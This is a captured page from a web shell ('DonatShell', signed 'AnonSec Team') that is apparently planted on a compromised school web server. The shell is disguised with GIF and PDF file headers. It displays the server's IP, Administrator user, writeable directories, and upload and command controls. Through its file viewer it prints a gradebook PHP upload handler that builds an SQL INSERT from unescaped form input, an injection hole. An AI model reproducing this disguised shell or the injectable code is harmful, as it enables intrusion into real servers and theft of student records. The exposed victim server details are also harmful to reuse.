GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Gradebook/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Gradebook//EvaluationSubmission_PROCESS.phpinc
<?
// Gradebook/EvaluationSubmission_PROCESS.phpinc
// BEGIN Evaluation submission process code.

#if ( $_SESSION['userId'] == 1 ) d_On();
#d_On(); d_Var('$_POST',$_POST); d_Off();

$EvaluationSubmission_PROCESS = true;

$f_evaluationNumber = formValue('evaluationNumber');
$f_classId = formValue('classId');
$f_classNumber = formValue('classNumber');
$f_classSection = formValue('classSection');
$f_courseNumber = formValue('courseNumber');
$f_evaluationId = formValue('evaluationId');
$f_evaluationName = formValue('evaluationName');
$f_evaluationTitle = formValue('evaluationTitle');
$f_evaluationType = formValue('evaluationType');
$f_uploadFilename = formValue('uploadFilename');
$f_userFullName = formValue('userFullName');
$f_userId = formValue('userId');
$f_userStudentId = formValue('userStudentId');
$HTTP_REFERER = formValue('HTTP_REFERER','');
$MAX_FILE_SIZE = formValue('MAX_FILE_SIZE','');
$uploaddir = $_SESSION['DIRECTORY_ROOT'].$_SESSION['UPLOAD_DIR'].$_SESSION['YRTR']['User'].'/'.$f_classNumber.'/'.$f_classSection.'/'.$f_userStudentId.'/'.$evaluationName.'/';

$submittedNote = 'submitted';
if ( $_SESSION['uuid'] != $f_uuid ) { # || d_O()
	#d_On();
	d_Var('$f_form',$f_form);
	d_Var('$f_task',$f_task,'f');
	d_Var('$f_uuid',$f_uuid,'f');
	d_Var('$f_evaluationNumber',$f_evaluationNumber,'f');
	d_Var('$f_classId',$f_classId,'f');
	d_Var('$f_classNumber',$f_classNumber,'f');
	d_Var('$f_classSection',$f_classSection,'f');
	d_Var('$f_courseNumber',$f_courseNumber,'f');
	d_Var('$f_evaluationId',$f_evaluationId,'f');
	d_Var('$f_evaluationName',$f_evaluationName,'f');
	d_Var('$f_evaluationTitle',$f_evaluationTitle,'f');
	d_Var('$f_evaluationType',$f_evaluationType,'f');
	d_Var('$f_uploadFilename',$f_uploadFilename,'f');
	d_Var('$f_userFullName',$f_userFullName,'f');
	d_Var('$f_userId',$f_userId,'f');
	d_Var('$f_userStudentId',$f_userStudentId,'f');
	d_Var('$HTTP_REFERER',$HTTP_REFERER,'f');
	d_Var('$MAX_FILE_SIZE',$MAX_FILE_SIZE,'f');
	@d_Var("\$_FILES['fileUpload']",$_FILES['fileUpload'],'f');
	d_Var('$uploaddir',$uploaddir,'f');
	
	$f_error = true;
	$f_message = '';
	$previousFile = false;
	if ( isset($_FILES['fileUpload']) ) {
		switch ($_FILES['fileUpload']['error']) {
			case 0:
				// UPLOAD_ERR_OK Value: 0; There is no error, the file uploaded with success. 
				$f_error = false;
				// There was no upload error.
				#echo '<i>'.__FILE__.':'.__LINE__.':</i> '."\$uploaddir=".$uploaddir."<br>\n";
				$saveFile = file_exists($uploaddir);
				d_Var('$saveFile',$saveFile);
				#echo '<i>'.__FILE__.':'.__LINE__.':</i> '."file_exists($uploaddir)="; if ($saveFile) { echo "true"; } else { echo "false"; } echo "<br>\n";
				//mk_dir('d:/test2');
				if ( !$saveFile ) {
					#$uploaddir2 = str_replace('/','\\',$uploaddir);
					#d_Var('uploaddir2',$uploaddir2);
					$saveFile = mk_dir($uploaddir);
					if ( !$saveFile ) {
						d_Var('$saveFile',$saveFile,'d');					
						print_r(error_get_last());
					}
				}
				
				#mk_dir($uploaddir);
				//echo '<i>'.__FILE__.':'.__LINE__.':</i> '."\$saveFile="; if ($saveFile) { //echo "true"; } else { //echo "false"; } //echo "<br>\n";
				//echo '<i>'.__FILE__.':'.__LINE__.':</i> '."\$_FILES['fileUpload']['type']=".$_FILES['fileUpload']['type']."<br>\n";
				if ( $saveFile ) {
					#if ( $_FILES['fileUpload']['type'] == 'application/zip' ) { // Did not work from IE.
						// File is of correct type.
						if ( $_FILES['fileUpload']['name'] == $f_uploadFilename ) {
							// File has the correct name.
							if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ",'<i>'.__FILE__.':'.__LINE__.':</i> '.__FILE__.":".__LINE__.": \$uploaddir=".$uploaddir."<br>\n";
								echo '<i>'.__FILE__.':'.__LINE__.':</i> '.__FILE__.":".__LINE__.": \$uploadfile=".$uploadfile."<br>\n";
							}
							d_Var('uploaddir',$uploaddir);
							$uploadfile = $uploaddir.basename($_FILES['fileUpload']['name']);
							d_Var('$uploadfile',$uploadfile);
							// Check for existing upload.
							$previousFile = file_exists($uploadfile);
							d_Var('$previousFile',$previousFile);
							if ( $previousFile ) {
								// Rename the existing file.
								$renamenumber = 0;
								$renamefile = explode('.zip',$uploadfile);
								d_Var('$renamefile',$renamefile);
								$renamefile = $renamefile[0].'.bak'.$renamenumber.'.zip';
								d_Var('$renamefile',$renamefile);
								while ( file_exists($renamefile) ) {
									// Increase the renamenumber and try again.
									$renamenumber++;
									$renamefile = explode('.zip',$uploadfile);
									d_Var('$renamefile',$renamefile);
									$renamefile = $renamefile[0].'.bak'.$renamenumber.'.zip';
									d_Var('$renamefile',$renamefile);
								}
								// Rename the previous file.
								rename($uploadfile,$renamefile);
							}
							if ( move_uploaded_file($_FILES['fileUpload']['tmp_name'], $uploadfile )) {
								// Success
								$fileUpload = basename($_FILES['fileUpload']['name']);
							} else {
								// Fail
								$f_error = true;
								$f_message = '<h3 class="center error"><span class="errorbold">The website has experienced an error: The file <b>'.$uploadfile.'</b> cannot be saved.</span><br>Please notify the website administrator <a href="mailto:'.$_SESSION['websiteAdministratorEmail'].'">'.$_SESSION['websiteAdministratorName'].'</a> at '.$_SESSION['websiteAdministratorEmail'].'.</h3>';
							}
						} else {
							// File does not have the correct name.
							$f_error = true;
							$f_message = '<h3 class="center error"><span class="errorbold">Your upload file name <b>'.$_FILES['fileUpload']['name'].'</b> was incorrect.</span><br>It should have been named <b>'.$f_uploadFilename.'</b>. The file was not saved.</h3>';
						}
					#} else {
					#	// File is not of correct type.
					#	$f_error = true;
					#	$f_message = '<h3 class="center error">File upload error. The file '.$_FILES['fileUpload']['name'].' is not of type: application/zip.</h3>';
					#}
				} else {
					// Unable to create or detect directory.
					$f_error = true;
					$f_message = '<h3 class="center error"><span class="errorbold">The website has experienced an error: The upload directory <b>'.$uploaddir.'</b> cannot be created.</span><br>Please notify the website administrator <a href="mailto:'.$_SESSION['websiteAdministratorEmail'].'">'.$_SESSION['websiteAdministratorName'].'</a> at '.$_SESSION['websiteAdministratorEmail'].'.</h3>';
				}
				break;
			case 1:
				// UPLOAD_ERR_INI_SIZE Value: 1; The uploaded file exceeds the upload_max_filesize directive in php.ini. 
				$f_error = true;
				$f_message = '<h3 class="center error">File upload error. The file '.$_FILES['fileUpload']['name'].' was too large. (php.ini)</h3>';
				break;
			case 2:
				// UPLOAD_ERR_FORM_SIZE Value: 2; The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form. 
				$f_error = true;
				$f_message = '<h3 class="center error">File upload error. The file '.$_FILES['fileUpload']['name'].' was too large. (HTML)</h3>';
				break;
			case 3:
				// UPLOAD_ERR_PARTIAL Value: 3; The uploaded file was only partially uploaded. 
				$f_error = true;
				$f_message = '<h3 class="center error">File upload error. The file '.$_FILES['fileUpload']['name'].' was only partially uploaded.</h3>';
				break;
			case 4:
				// UPLOAD_ERR_NO_FILE Value: 4; No file was uploaded. This only means that no file was selected for upload.
				$f_error = true;
				$f_message = '<h3 class="center error">File upload error. No file was uploaded.</h3>';
				break;
			case 6:
				// UPLOAD_ERR_NO_TMP_DIR Value: 6; Missing a temporary folder. Introduced in PHP 4.3.10 and PHP 5.0.3. 
				$f_error = true;
				$f_message = '<h3 class="center error"><span class="errorbold">The website has experienced an error: Missing a temporary folder.</span><br>Please notify the website administrator <a href="mailto:'.$_SESSION['websiteAdministratorEmail'].'">'.$_SESSION['websiteAdministratorName'].'</a> at '.$_SESSION['websiteAdministratorEmail'].'.</h3>';
				break;
			case 7:
				// UPLOAD_ERR_CANT_WRITE Value: 7; Failed to write file to disk. Introduced in PHP 5.1.0. 
				$f_error = true;
				$f_message = '<h3 class="center error"><span class="errorbold">The website has experienced an error: Failed to write file to disk.</span><br>Please notify the website administrator <a href="mailto:'.$_SESSION['websiteAdministratorEmail'].'">'.$_SESSION['websiteAdministratorName'].'</a> at '.$_SESSION['websiteAdministratorEmail'].'.</h3>';
				break;
			case 8:
				// UPLOAD_ERR_EXTENSION Value: 8; File upload stopped by extension. Introduced in PHP 5.2.0. 
				$f_error = true;
				$f_message = '<h3 class="center error">File upload error. The file '.$_FILES['fileUpload']['name'].' upload stopped by PHP extension.</h3>';
				break;
			default:
				$f_error = true;
				$f_message = '<h3 class="center error"><span class="errorbold">The website has experienced an error: UNKNOWN ERROR #'.$_FILES['fileUpload']['error'].'.</span><br>Please notify the website administrator <a href="mailto:'.$_SESSION['websiteAdministratorEmail'].'">'.$_SESSION['websiteAdministratorName'].'</a> at '.$_SESSION['websiteAdministratorEmail'].'.</h3>';
				break;
		}	
		d_Var('$previousFile',$previousFile);
		d_Var('$f_error',$f_error);
		d_Var('$f_message',$f_message,'h');
	} else {
		$f_error = false;
	}
	
	if ( !$f_error ) { // Is there NO error?
		#d_Var('$f_evaluationId',$f_evaluationId,'d');
		if ( !isset($gradeResultCount) ) {
			require('common/Class/EvalGrade.phpinc');
			if ( $gradeResultCount ) {
				mysqli_data_seek($gradeResult, 0);
				$gradeRow = mysqli_fetch_assoc($gradeResult);
			}
		}
		#@d_Var('$gradeRow',$gradeRow,'d');
		if ( $gradeResultCount ) { // Was there a grade result?
			// Yes, UPDATE the grade submission.
			$f_lastModified = currentDateTime();
			#$gradeRow['lastModified'] = currentDateTime();
			#$gradeInternalComment = $gradeRow['gradeInternalComment'];
			if ( isset($gradeRow) && $gradeRow['gradeGraded'] ) {
				#$gradeRow['lastModified'] = $f_lastModified;
				$dateParts = explode(' ',$f_lastModified);
				$date = valid_date($dateParts[0]); // Throw away time.
				if ( isset($dateParts[1]) ) { $time = ' at '.valid_time($dateParts[1]); } else { $time = ''; }
				#echo "<br>\nSubmitted on: ".$date.$time.'.';
				$gradeInternalComment = 'Last grade: '.$gradeRow['gradeGrade'].' on '.$date.$time.".\n".$gradeRow['gradeInternalComment'];
			} else {
				#$gradeRow['lastModified'] = $f_lastModified;
				#$gradeInternalComment = 'Last grade: '.$gradeRow['gradeGrade'].' on '.$gradeRow['lastModified'].".\n".$gradeInternalComment;
				$gradeInternalComment = '';
			}
			$query = "
					UPDATE `grade` 
						 SET gradeSubmitted = true,
								 gradeGraded = false,
								 gradeInternalComment = '".query_safe($gradeInternalComment)."',
								 lastModified = '".query_safe($f_lastModified)."',
								 modifiedBy = ".$_SESSION['trueuserId']."
					 WHERE gradeId = ". $gradeRow['gradeId']."
			";
			$gradeUpdate = query_do($query);
			#d_Var('gradeUpdate',$query,'d');
			// Create the message.
			$f_message = '<h3 class="center info">'.$f_evaluationType.' '.$f_evaluationNumber.' re-submitted.</h3>';
			$submittedNote = 're-submitted';
		} else { // Was there a grade result?
			// No, INSERT a grade submission.
			$f_lastModified = currentDateTime();
			$f_gradeGradedOn = currentDateTime();
			$gradeRow = array();
			$gradeRow['userId'] = $_SESSION['trueuserId'];
			$gradeRow['evaluationId'] = $f_evaluationId;
			$gradeRow['gradeSubmitted'] = true;
			$gradeRow['lastModified'] = query_safe(currentDateTime());
			$gradeRow['modifiedBy'] = $_SESSION['trueuserId'];
			$gradeRow['userId'] = $_SESSION['trueuserId'];
			$gradeRow['userId'] = $_SESSION['trueuserId'];
			$gradeRow['userId'] = $_SESSION['trueuserId'];
			$query = "
					INSERT
						INTO `grade` (
						userId,
						evaluationId,
						gradeSubmitted,
						lastModified,
						modifiedBy
					) VALUES (
						".$gradeRow['userId'].",
						".$gradeRow['evaluationId'].",
						".$gradeRow['gradeSubmitted'].",
					 '".$gradeRow['lastModified']."',
						".$gradeRow['modifiedBy']."
					)
			";
			$gradeInsert = query_do($query);
			// Create the message.
			$f_message = '<h3 class="center info">'.$f_evaluationType.' '.$f_evaluationNumber.' submitted.</h3>';
		} // Was there a grade result?
	} // Is there NO error?
	$f_uuidPrevious = $_SESSION['uuid'];
	$_SESSION['uuid'] = $f_uuid;
	d_Off();
} else {
	$f_message = '<h3 class="center warn">'.$f_evaluationType.' '.$f_evaluationNumber.' already submitted.</h3>';
	$submittedNote = 'already submitted';
}
// END Evaluation submission process code.
?>

Anon7 - 2022
AnonSec Team